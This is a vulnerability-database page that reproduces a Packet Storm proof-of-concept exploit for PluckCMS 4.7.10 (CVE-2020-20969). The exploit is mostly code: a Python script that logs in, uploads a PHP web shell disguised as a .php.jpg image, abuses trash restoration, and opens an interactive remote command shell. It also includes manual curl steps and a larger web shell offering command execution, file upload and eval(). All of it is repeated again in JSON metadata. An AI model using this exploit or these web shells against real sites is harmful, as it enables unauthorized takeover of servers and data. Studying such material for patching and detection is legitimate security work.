📄 PluckCMS 4.7.10 Shell Upload_PACKETSTORM:215639

7.2 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Description

PluckCMS version 4.7.10 remote shell upload proof of concept exploit...

Visit Original Source

Basic Information

ID PACKETSTORM:215639

Published Feb 16, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : PluckCMS 4.7.10 Unrestricted File Upload RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/pluck-cms/pluck/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212393/ & CVE-2020-20969

[+] Summary : The trash restoration functionality (/admin.php?action=trash_restoreitem) fails to properly validate file extensions when restoring files from the trash directory,
allowing attackers to restore malicious PHP files with double extensions (e.g., .php.jpg) that were previously uploaded to the system.

[+] POC : python poc.py

#!/usr/bin/env python3

import requests
import sys
import time
import os
from urllib.parse import urljoin

class PluckCMSExploit:
def __init__(self, target_url, username, password):
self.target_url = target_url.rstrip('/')
self.session = requests.Session()
self.username = username
self.password = password

def login(self):
"""Login to PluckCMS admin panel"""
login_url = urljoin(self.target_url, '/admin.php')

# First get the login page to obtain any required tokens
print("[*] Getting login page...")
response = self.session.get(login_url)

# Prepare login data (adjust field names based on actual form)
login_data = {
'cont1': self.username,
'cont2': self.password,
'submit': 'Log in'
}

print(f"[*] Attempting login as {self.username}...")
response = self.session.post(login_url, data=login_data)

# Check if login was successful
if 'admin.php' in response.url and 'action=page' in response.text:
print("[+] Login successful!")
return True
else:
print("[-] Login failed!")
return False

def upload_malicious_file(self):
"""Upload a file with double extension (.php.jpg)"""
upload_url = urljoin(self.target_url, '/admin.php?action=files')

# Create a malicious PHP file with backdoor
php_shell = """<?php
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
} else {
echo "PluckCMS RCE - CVE-2020-20969";
}
?>"""

# Write to local file first
with open('exploit.php.jpg', 'w') as f:
f.write(php_shell)

# Prepare the upload
files = {
'uploadfile': ('exploit.php.jpg', open('exploit.php.jpg', 'rb'), 'image/jpeg')
}

data = {
'sendfile': 'Upload'
}

print("[*] Uploading malicious file (exploit.php.jpg)...")
response = self.session.post(upload_url, files=files, data=data)

# Clean up local file
os.remove('exploit.php.jpg')

if 'exploit.php.jpg' in response.text:
print("[+] File uploaded successfully!")
return True
else:
print("[-] File upload failed!")
return False

def move_to_trash(self):
"""Move the file to trash (simulate user action)"""
# This would normally be done through the admin interface
# For the PoC, we'll assume the file is in trash
print("[*] Note: You need to move 'exploit.php.jpg' to trash via admin interface")
print("[*] Or ensure it exists in data/trash/files/ directory")
return True

def exploit_trash_restore(self):
"""Exploit the trash restoration vulnerability"""
exploit_url = urljoin(self.target_url, '/admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file')

print("[*] Exploiting trash restoration vulnerability...")
response = self.session.get(exploit_url)

if response.status_code == 200:
print("[+] Trash restoration successful!")

# Verify the file was restored
check_url = urljoin(self.target_url, '/files/exploit_copy.php')
response = self.session.get(check_url)

if 'PluckCMS RCE' in response.text:
print("[+] Exploit confirmed! File accessible at:")
print(f" {check_url}")
return True
return False

def execute_command(self, command):
"""Execute a command on the target"""
cmd_url = urljoin(self.target_url, f'/files/exploit_copy.php?cmd={command}')

print(f"[*] Executing command: {command}")
response = self.session.get(cmd_url)

if response.status_code == 200:
print("[+] Command output:")
print(response.text.strip())
return response.text
return None

def run(self):
"""Run the complete exploit chain"""
print("[*] PluckCMS 4.7.10 - Unrestricted File Upload RCE (CVE-2020-20969)")
print(f"[*] Target: {self.target_url}")

# Step 1: Login
if not self.login():
return

# Step 2: Upload malicious file
if not self.upload_malicious_file():
print("[-] Upload failed. Continuing with assumption file exists...")

# Step 3: User needs to move file to trash manually
self.move_to_trash()

input("[*] Press Enter after moving exploit.php.jpg to trash via admin panel...")

# Step 4: Exploit trash restoration
if self.exploit_trash_restore():
# Step 5: Test command execution
print("\n[*] Testing command execution...")
self.execute_command('whoami')
self.execute_command('pwd' if 'linux' in sys.platform else 'dir')

# Interactive shell
print("\n[+] Interactive shell mode (type 'exit' to quit)")
while True:
cmd = input("shell> ").strip()
if cmd.lower() in ['exit', 'quit']:
break
if cmd:
self.execute_command(cmd)
else:
print("[-] Exploit failed. Possible reasons:")
print(" - File not in trash directory")
print(" - Different file naming")
print(" - Already patched")

# Manual exploitation using curl commands
def manual_exploit_curl():
"""Manual exploitation steps using curl"""
print("\n" + "="*60)
print("MANUAL EXPLOITATION WITH CURL")
print("="*60)

manual_steps = """
STEP 1: Login and get session cookie
------------------------------------
curl -c cookies.txt -X POST {target}/admin.php \\
-d "cont1=admin&cont2=password&submit=Log+in"

STEP 2: Upload malicious file (if needed)
-----------------------------------------
curl -b cookies.txt -X POST {target}/admin.php?action=files \\
-F "[email protected]" \\
-F "sendfile=Upload"

STEP 3: Exploit trash restoration
---------------------------------
curl -b cookies.txt \\
"{target}/admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file"

STEP 4: Execute commands
------------------------
curl "{target}/files/exploit_copy.php?cmd=id"

STEP 5: Clean up
----------------
curl -b cookies.txt \\
"{target}/admin.php?action=files&var=exploit_copy.php&action2=delete"
""".format(target="http://target.com")

print(manual_steps)

# Web shell content
def generate_webshell():
"""Generate a more advanced web shell"""
advanced_shell = """<?php
// PluckCMS CVE-2020-20969 Web Shell
error_reporting(0);
echo "<pre>";

// Command execution
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}

// File upload
if(isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
echo "File uploaded!";
}

// PHP code execution
if(isset($_POST['code'])) {
eval($_POST['code']);
}

// Show upload form
echo '
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>

<form method="POST">
<textarea name="code" rows="10" cols="80"></textarea><br>
<input type="submit" value="Execute PHP">
</form>
';
echo "</pre>";
?>"""

# Save the web shell
with open('webshell.php.jpg', 'w') as f:
f.write(advanced_shell)
print("[+] Advanced web shell saved as 'webshell.php.jpg'")
return advanced_shell

if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python3 pluck_exploit.py <target_url> <username> <password>")
print("Example: python3 pluck_exploit.py http://localhost/pluck admin admin123")
print("\nExample manual steps:")
manual_exploit_curl()

print("\n" + "="*60)
print("QUICK MANUAL METHOD:")
print("="*60)
print("""
1. Login to admin panel
2. Upload a file named 'exploit.php.jpg' with this content:
<?php system($_GET['cmd']); ?>

3. Move the file to trash via admin interface

4. Send this request (replace PHPSESSID with your session):
GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file

5. Access your shell:
http://target/files/exploit_copy.php?cmd=id
""")

# Ask if user wants to generate a web shell
if input("\nGenerate web shell file? (y/n): ").lower() == 'y':
generate_webshell()

sys.exit(1)

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

exploit = PluckCMSExploit(target, username, password)
exploit.run()

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-16T17:13:25",
    "description": "PluckCMS version 4.7.10 remote shell upload proof of concept exploit...",
    "published": "2026-02-16T00:00:00",
    "modified": "2026-02-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 PluckCMS 4.7.10 Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215639",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2020-20969"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : PluckCMS 4.7.10 Unrestricted File Upload RCE                                                                                |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://github.com/pluck-cms/pluck/                                                                                         |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212393/ &  \tCVE-2020-20969\n    \n    [+] Summary : The trash restoration functionality (/admin.php?action=trash_restoreitem) fails to properly validate file extensions when restoring files from the trash directory, \n                  allowing attackers to restore malicious PHP files with double extensions (e.g., .php.jpg) that were previously uploaded to the system.\t\t\t \n    \t\t\t  \n    [+]  POC : python poc.py\n    \n    #!/usr/bin/env python3\n    \n    import requests\n    import sys\n    import time\n    import os\n    from urllib.parse import urljoin\n    \n    class PluckCMSExploit:\n        def __init__(self, target_url, username, password):\n            self.target_url = target_url.rstrip('/')\n            self.session = requests.Session()\n            self.username = username\n            self.password = password\n            \n        def login(self):\n            \"\"\"Login to PluckCMS admin panel\"\"\"\n            login_url = urljoin(self.target_url, '/admin.php')\n            \n            # First get the login page to obtain any required tokens\n            print(\"[*] Getting login page...\")\n            response = self.session.get(login_url)\n            \n            # Prepare login data (adjust field names based on actual form)\n            login_data = {\n                'cont1': self.username,\n                'cont2': self.password,\n                'submit': 'Log in'\n            }\n            \n            print(f\"[*] Attempting login as {self.username}...\")\n            response = self.session.post(login_url, data=login_data)\n            \n            # Check if login was successful\n            if 'admin.php' in response.url and 'action=page' in response.text:\n                print(\"[+] Login successful!\")\n                return True\n            else:\n                print(\"[-] Login failed!\")\n                return False\n        \n        def upload_malicious_file(self):\n            \"\"\"Upload a file with double extension (.php.jpg)\"\"\"\n            upload_url = urljoin(self.target_url, '/admin.php?action=files')\n            \n            # Create a malicious PHP file with backdoor\n            php_shell = \"\"\"<?php\n    if(isset($_GET['cmd'])) {\n        system($_GET['cmd']);\n    } else {\n        echo \"PluckCMS RCE - CVE-2020-20969\";\n    }\n    ?>\"\"\"\n            \n            # Write to local file first\n            with open('exploit.php.jpg', 'w') as f:\n                f.write(php_shell)\n            \n            # Prepare the upload\n            files = {\n                'uploadfile': ('exploit.php.jpg', open('exploit.php.jpg', 'rb'), 'image/jpeg')\n            }\n            \n            data = {\n                'sendfile': 'Upload'\n            }\n            \n            print(\"[*] Uploading malicious file (exploit.php.jpg)...\")\n            response = self.session.post(upload_url, files=files, data=data)\n            \n            # Clean up local file\n            os.remove('exploit.php.jpg')\n            \n            if 'exploit.php.jpg' in response.text:\n                print(\"[+] File uploaded successfully!\")\n                return True\n            else:\n                print(\"[-] File upload failed!\")\n                return False\n        \n        def move_to_trash(self):\n            \"\"\"Move the file to trash (simulate user action)\"\"\"\n            # This would normally be done through the admin interface\n            # For the PoC, we'll assume the file is in trash\n            print(\"[*] Note: You need to move 'exploit.php.jpg' to trash via admin interface\")\n            print(\"[*] Or ensure it exists in data/trash/files/ directory\")\n            return True\n        \n        def exploit_trash_restore(self):\n            \"\"\"Exploit the trash restoration vulnerability\"\"\"\n            exploit_url = urljoin(self.target_url, '/admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file')\n            \n            print(\"[*] Exploiting trash restoration vulnerability...\")\n            response = self.session.get(exploit_url)\n            \n            if response.status_code == 200:\n                print(\"[+] Trash restoration successful!\")\n                \n                # Verify the file was restored\n                check_url = urljoin(self.target_url, '/files/exploit_copy.php')\n                response = self.session.get(check_url)\n                \n                if 'PluckCMS RCE' in response.text:\n                    print(\"[+] Exploit confirmed! File accessible at:\")\n                    print(f\"    {check_url}\")\n                    return True\n            return False\n        \n        def execute_command(self, command):\n            \"\"\"Execute a command on the target\"\"\"\n            cmd_url = urljoin(self.target_url, f'/files/exploit_copy.php?cmd={command}')\n            \n            print(f\"[*] Executing command: {command}\")\n            response = self.session.get(cmd_url)\n            \n            if response.status_code == 200:\n                print(\"[+] Command output:\")\n                print(response.text.strip())\n                return response.text\n            return None\n        \n        def run(self):\n            \"\"\"Run the complete exploit chain\"\"\"\n            print(\"[*] PluckCMS 4.7.10 - Unrestricted File Upload RCE (CVE-2020-20969)\")\n            print(f\"[*] Target: {self.target_url}\")\n            \n            # Step 1: Login\n            if not self.login():\n                return\n            \n            # Step 2: Upload malicious file\n            if not self.upload_malicious_file():\n                print(\"[-] Upload failed. Continuing with assumption file exists...\")\n            \n            # Step 3: User needs to move file to trash manually\n            self.move_to_trash()\n            \n            input(\"[*] Press Enter after moving exploit.php.jpg to trash via admin panel...\")\n            \n            # Step 4: Exploit trash restoration\n            if self.exploit_trash_restore():\n                # Step 5: Test command execution\n                print(\"\\n[*] Testing command execution...\")\n                self.execute_command('whoami')\n                self.execute_command('pwd' if 'linux' in sys.platform else 'dir')\n                \n                # Interactive shell\n                print(\"\\n[+] Interactive shell mode (type 'exit' to quit)\")\n                while True:\n                    cmd = input(\"shell> \").strip()\n                    if cmd.lower() in ['exit', 'quit']:\n                        break\n                    if cmd:\n                        self.execute_command(cmd)\n            else:\n                print(\"[-] Exploit failed. Possible reasons:\")\n                print(\"    - File not in trash directory\")\n                print(\"    - Different file naming\")\n                print(\"    - Already patched\")\n    \n    # Manual exploitation using curl commands\n    def manual_exploit_curl():\n        \"\"\"Manual exploitation steps using curl\"\"\"\n        print(\"\\n\" + \"=\"*60)\n        print(\"MANUAL EXPLOITATION WITH CURL\")\n        print(\"=\"*60)\n        \n        manual_steps = \"\"\"\n    STEP 1: Login and get session cookie\n    ------------------------------------\n    curl -c cookies.txt -X POST {target}/admin.php \\\\\n      -d \"cont1=admin&cont2=password&submit=Log+in\"\n    \n    STEP 2: Upload malicious file (if needed)\n    -----------------------------------------\n    curl -b cookies.txt -X POST {target}/admin.php?action=files \\\\\n      -F \"[email protected]\" \\\\\n      -F \"sendfile=Upload\"\n    \n    STEP 3: Exploit trash restoration\n    ---------------------------------\n    curl -b cookies.txt \\\\\n      \"{target}/admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file\"\n    \n    STEP 4: Execute commands\n    ------------------------\n    curl \"{target}/files/exploit_copy.php?cmd=id\"\n    \n    STEP 5: Clean up\n    ----------------\n    curl -b cookies.txt \\\\\n      \"{target}/admin.php?action=files&var=exploit_copy.php&action2=delete\"\n        \"\"\".format(target=\"http://target.com\")\n        \n        print(manual_steps)\n    \n    # Web shell content\n    def generate_webshell():\n        \"\"\"Generate a more advanced web shell\"\"\"\n        advanced_shell = \"\"\"<?php\n    // PluckCMS CVE-2020-20969 Web Shell\n    error_reporting(0);\n    echo \"<pre>\";\n    \n    // Command execution\n    if(isset($_GET['cmd'])) {\n        system($_GET['cmd']);\n    }\n    \n    // File upload\n    if(isset($_FILES['file'])) {\n        move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);\n        echo \"File uploaded!\";\n    }\n    \n    // PHP code execution\n    if(isset($_POST['code'])) {\n        eval($_POST['code']);\n    }\n    \n    // Show upload form\n    echo '\n    <form method=\"POST\" enctype=\"multipart/form-data\">\n    <input type=\"file\" name=\"file\">\n    <input type=\"submit\" value=\"Upload\">\n    </form>\n    \n    <form method=\"POST\">\n    <textarea name=\"code\" rows=\"10\" cols=\"80\"></textarea><br>\n    <input type=\"submit\" value=\"Execute PHP\">\n    </form>\n    ';\n    echo \"</pre>\";\n    ?>\"\"\"\n        \n        # Save the web shell\n        with open('webshell.php.jpg', 'w') as f:\n            f.write(advanced_shell)\n        print(\"[+] Advanced web shell saved as 'webshell.php.jpg'\")\n        return advanced_shell\n    \n    if __name__ == \"__main__\":\n        if len(sys.argv) != 4:\n            print(\"Usage: python3 pluck_exploit.py <target_url> <username> <password>\")\n            print(\"Example: python3 pluck_exploit.py http://localhost/pluck admin admin123\")\n            print(\"\\nExample manual steps:\")\n            manual_exploit_curl()\n            \n            print(\"\\n\" + \"=\"*60)\n            print(\"QUICK MANUAL METHOD:\")\n            print(\"=\"*60)\n            print(\"\"\"\n    1. Login to admin panel\n    2. Upload a file named 'exploit.php.jpg' with this content:\n       <?php system($_GET['cmd']); ?>\n       \n    3. Move the file to trash via admin interface\n       \n    4. Send this request (replace PHPSESSID with your session):\n       GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file\n       \n    5. Access your shell:\n       http://target/files/exploit_copy.php?cmd=id\n            \"\"\")\n            \n            # Ask if user wants to generate a web shell\n            if input(\"\\nGenerate web shell file? (y/n): \").lower() == 'y':\n                generate_webshell()\n            \n            sys.exit(1)\n        \n        target = sys.argv[1]\n        username = sys.argv[2]\n        password = sys.argv[3]\n        \n        exploit = PluckCMSExploit(target, username, password)\n        exploit.run()\n    \n    \t\n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215639",
    "cvss": {
        "score": 7.2,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215639/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply